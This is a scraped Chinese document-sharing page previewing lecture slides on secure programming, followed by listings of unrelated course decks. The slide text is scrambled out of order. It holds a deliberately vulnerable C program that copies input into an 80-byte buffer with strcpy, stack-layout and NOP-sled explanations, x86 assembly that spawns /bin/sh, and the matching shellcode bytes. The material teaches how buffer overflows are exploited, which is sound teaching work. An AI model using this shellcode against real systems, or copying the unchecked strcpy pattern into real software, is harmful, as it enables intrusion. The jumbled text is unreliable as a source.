正文內(nèi)容

李鳳華--計算機安全與保密技術(shù)--第十章-展示頁

2025-03-07 12:32本頁面

　　

【正文】 /bin/sh”, 0esi+8: cmd, 0 esi == cmd運行程序路徑exec植入代碼如何編寫jmp label2label1: pop esimov [esi+8], esixor eax, eaxmov [esi+7], almov [esi+12], eaxmov al, 0bhmov ebx, esilea ecx, [esi+8]lea edx, [esi+12]int 80hxor ebx, ebxmov eax, ebxinc eaxint 80hlabel2: call label1cmd: db “/bin/sh”, 0esi+8: cmd, 0 esi == cmd_exit植入代碼二進制格式char shell_code[] = \xeb\x1f\x5e\x89\x76\x08\x31\xc0” “\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/sh。用同樣選項，插入一段代碼，重新編譯216。該偏移不需要精確為什么偏移不需要精確？0xNNNNNNNN………..NNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN……….NNNNNNOPNOP……..NOPRealCodesESP SayHello棧幀retip0xNNNNNNNN代碼起始地址如何確定p問題已轉(zhuǎn)化為用 ESP加上某一偏移216。Our codes該怎樣寫216。SayHello函數(shù)局部變量區(qū)大??？216。} 進一步思考 …… 發(fā)生了什么事發(fā)生了什么事？？幾個要點pLinux及其它幾乎所有 Intel x86系統(tǒng)、 Solaris, etcp分頁式存儲管理p平面內(nèi)存結(jié)構(gòu)， 4GB或更大邏輯地址空間p棧從下往上生長pC語言不進行邊界檢查進程內(nèi)存布局代碼區(qū)數(shù)據(jù)區(qū)堆棧段字符串向下生長棧段向上生長0x000000000xFFFFFFFF調(diào)用 SayHello之前的棧main函數(shù)局部變量區(qū)lastfpretipargcargvenv…...ESP main棧幀進入 SayHello后的棧tmpName[80]mainfpretipnamemain棧幀…...ESP SayHello棧幀準備退出 SayHello的棧 (情況 1) puter. …………..mainfpretipnamemain棧幀…...ESP SayHello棧幀 main中 return 0。 } SayHello(argv[1])。}int main(int argc, char** argv){ if (argc != 2) { printf(Usage: hello name.\n)。 strcpy(tmpName, name)。 return 0。 return 1。 /* Do some checks for tmpName. */ printf(Hello %s\n, tmpName)。Kernel 第一個程序include include void SayHello(char* name){ char tmpName[80]。網(wǎng)絡(luò)安全第十講安全程序設(shè)計本講內(nèi)容現(xiàn)實中的一些安全問題從幾個程序談起程序失敗的其它例子現(xiàn)實中的一些安全問題p我的我的口令就是我的用戶名后加上口令就是我的用戶名后加上 123p我的口令是我的口令是 Q47pY!3，每隔每隔 90天就更換一次天就更換一次p 強而有效的不可破解的加密技術(shù)隨處均可得到（盡管有各種各樣的進出口限制）?不攻擊加密技術(shù)，攻擊其應(yīng)用的底層基礎(chǔ)設(shè)施?不攻擊加密技術(shù)，攻擊其實現(xiàn)?不攻擊加密技術(shù)，而從用戶方面入手Why Security is Harder than it Looksp所有軟件都是有錯的p通常情況下 %無錯的程序很少會出問題p同安全相關(guān)的 %無錯的程序可以確信會被人利用那 %的錯誤%安全問題等于 100%的失敗從幾個程序談起p程序運行平臺216。Redhat Linux 216。 strcpy(tmpName, name)。}int main(int argc, char** argv){ if (argc != 2) { printf(Usage: hello name.\n)。 } SayHello(argv[1])。} 運行情況$ ./hello puterHello puter$ ./hello aaaa………………………………………………………….aHello aaaa……………………………………………………………….aSegmentation fault (core dumped) Why????檢查一下程序include include void SayHello(char* name){ char tmpName[80]。 /*

點擊復(fù)制文檔內(nèi)容

教學(xué)課件相關(guān)推薦

計算機本科c語言第十章講-展示頁

【摘要】2022年11月1日第十章指針重點：指針的概念、指針的運算、指針的應(yīng)用難點：指針概念的建立指針的概念1地址內(nèi)存區(qū)的每個字節(jié)有一個編號，這就是“地址”。內(nèi)存字節(jié)地址旅館

2025-01-27 20:18

計算機操作系統(tǒng)---第十章unix-展示頁

【摘要】第十章UNIX系統(tǒng)內(nèi)核結(jié)構(gòu)主要內(nèi)容?概述?進程控制子系統(tǒng)?文件子系統(tǒng)概述?UNIX系統(tǒng)是多用戶、多任務(wù)OS,可用在微型、小型、大型和多處理機系統(tǒng)。?UNIX最初用匯編語言編寫，后用B語言重寫，現(xiàn)在使用的是C語言版。?UNIX在不同公司使用不同的名字。?在UNIX系統(tǒng)上最早使用了TCP

2024-10-28 07:47

工學(xué)]計算機本科c語言第十章講-展示頁

2025-01-27 17:35

計算機本科c語言第十章講(1)-展示頁

【摘要】2022年11月1日第十章指針重點：指針的概念、指針的運算、指針的應(yīng)用難點：指針概念的建立凡在程序中定義的變量，在編譯時，系統(tǒng)都給它們分配相應(yīng)的存儲單元。如，一般微機C系統(tǒng)給int變量分配2字節(jié)，給float變量分配4字節(jié)。每個變量所占用的存儲單元都有

2025-01-27 19:38

第十章計算機財務(wù)管理系統(tǒng)的建立-展示頁

【摘要】山東建筑大學(xué)商學(xué)院財務(wù)管理教研室第十章計算機財務(wù)管理系統(tǒng)的建立1、計算機財務(wù)管理系統(tǒng)界面設(shè)計2、建立宏程序的方法VBA程序-〉函數(shù)、語句、對象、方法、屬性-也叫過程過程-子過程、函數(shù)過程SUB過程名（）語句序列ENDSUB

2025-07-30 02:10

[精選]第十章加密技術(shù)標(biāo)準、法律法規(guī)-展示頁

【摘要】2介紹3第十章加密技術(shù)標(biāo)準、法律法規(guī)加密技術(shù)標(biāo)準數(shù)字簽名標(biāo)準和電子簽名法安全電子交易規(guī)范SET國外相關(guān)PKT體系建設(shè)標(biāo)準國內(nèi)相關(guān)PKT體系建設(shè)標(biāo)準4ISO7498-2安全標(biāo)準?ISO7498-2提供了以下五種可選擇的安全服務(wù)?認證?訪問控制?數(shù)據(jù)保密

2025-01-14 09:04

[精選]網(wǎng)絡(luò)安全技術(shù)第十章-展示頁

【摘要】第十章網(wǎng)絡(luò)安全管理網(wǎng)絡(luò)安全管理，是為保證計算機網(wǎng)絡(luò)安全而進行的一切管理活動和過程，其目的是使網(wǎng)絡(luò)一切用戶能按規(guī)定獲得所需信息與服務(wù)的同時，保證網(wǎng)絡(luò)本身的可靠性、完整性、可用性以及其中信息資源的保密性、完整性、可用性、可控性和真實性達到給定的要求水平。第十章網(wǎng)絡(luò)安全管理第一節(jié)網(wǎng)絡(luò)安全管理概述第二節(jié)網(wǎng)絡(luò)

2025-02-12 22:34

[精選]第十章舒適與安全-展示頁

【摘要】第十章舒適與安全第一節(jié)滿足病人舒適的需要?舒適與不舒適?不舒適的原因?護理不舒適病人的原則?增進舒適的方法?各種臥位一、舒適與不舒適?舒適?不舒適?疼痛是不舒適中最嚴重的形式二、不舒適的原因?身體方面?個人衛(wèi)生?姿勢和體位不當(dāng)

2025-02-14 11:11

計算機安全與保密技術(shù)課程教學(xué)大綱-展示頁

【摘要】《計算機安全與保密技術(shù)》課程教學(xué)大綱（2020年制訂，2020年修訂）課程編號：英文名：ComputerSecurityandSecrecy課程類別：跨專業(yè)選修課前置課：程序設(shè)計基礎(chǔ)、面向?qū)ο蟪绦蛟O(shè)計、數(shù)據(jù)結(jié)構(gòu)、操作系統(tǒng)、ComputerNetworks后置課：學(xué)分：2學(xué)分

2024-11-08 01:16

[計算機軟件及應(yīng)用]第十章故障恢復(fù)與系統(tǒng)容錯-展示頁

【摘要】第十章故障恢復(fù)與系統(tǒng)容錯10．1概述現(xiàn)在已經(jīng)有若干種可提供容錯能力服務(wù)的方法。一般而言，具有容錯能力的服務(wù)也可能發(fā)生意外故障，但故障發(fā)生后可迅速恢復(fù)并保證不丟失數(shù)據(jù)。大多數(shù)具有容錯能力的應(yīng)用程序可劃分為基于事務(wù)型和基于進程控制型兩類，兩者的區(qū)別在于完成恢復(fù)過程所花的時間不同．故障發(fā)生后，基于事務(wù)型的服務(wù)將有一個相對

2025-01-28 17:38

mba第十章-展示頁

【摘要】安徽師范大學(xué)經(jīng)濟管理學(xué)院2023年安徽工商管理學(xué)院MBA營銷管理第十章促銷策略拒絕是推銷的開始；服務(wù)是利潤的開始。安徽師范大學(xué)經(jīng)濟管理學(xué)院2023年安徽工商管理學(xué)院MBA

2025-02-11 19:36

[精選]第十章安全與衛(wèi)生管理-展示頁

【摘要】第十章溫泉旅游安全與衛(wèi)生管理第一節(jié)安全管理概述?一、安全概念?“安全”一是平安，無危險，沒有事故?二是保全，保護?溫泉旅游安全指所涉及的范圍內(nèi)的所有人、財、物的安全及所產(chǎn)生的沒有危險、不受任何威脅的生理、心里的安全環(huán)境。第一節(jié)溫泉安全管理概述

2025-02-14 11:10

[精選]第十章供電與安全用電-展示頁

【摘要】下一頁總目錄章目錄返回上一頁第十章供電與安全用電第一節(jié)電力系統(tǒng)概述第二節(jié)配電變壓器的選擇第三節(jié)工業(yè)企業(yè)配電第四節(jié)安全用電第五節(jié)防雷保護第六節(jié)漏電開關(guān)下一頁總目錄章目錄返回上一頁本章要求：。。下一頁總目錄章目錄

2025-01-14 09:04

[精選]第十章三取二計算機聯(lián)鎖系統(tǒng)設(shè)備使用辦法-展示頁

【摘要】?第十章三取二計算機聯(lián)鎖?系統(tǒng)設(shè)備使用辦法?一、計算機聯(lián)鎖?用計算機設(shè)備來實現(xiàn)對車站聯(lián)鎖的控制，即計算機聯(lián)鎖。?二、為什么要實行計算機聯(lián)鎖：?車站信號設(shè)備是一個很復(fù)雜的自動控制系統(tǒng)，它經(jīng)歷了從機械聯(lián)鎖到繼電聯(lián)鎖的發(fā)展過程。采用繼電聯(lián)鎖固然有很高的安全性和可靠性。但是繼電聯(lián)鎖設(shè)備造

2025-01-14 07:54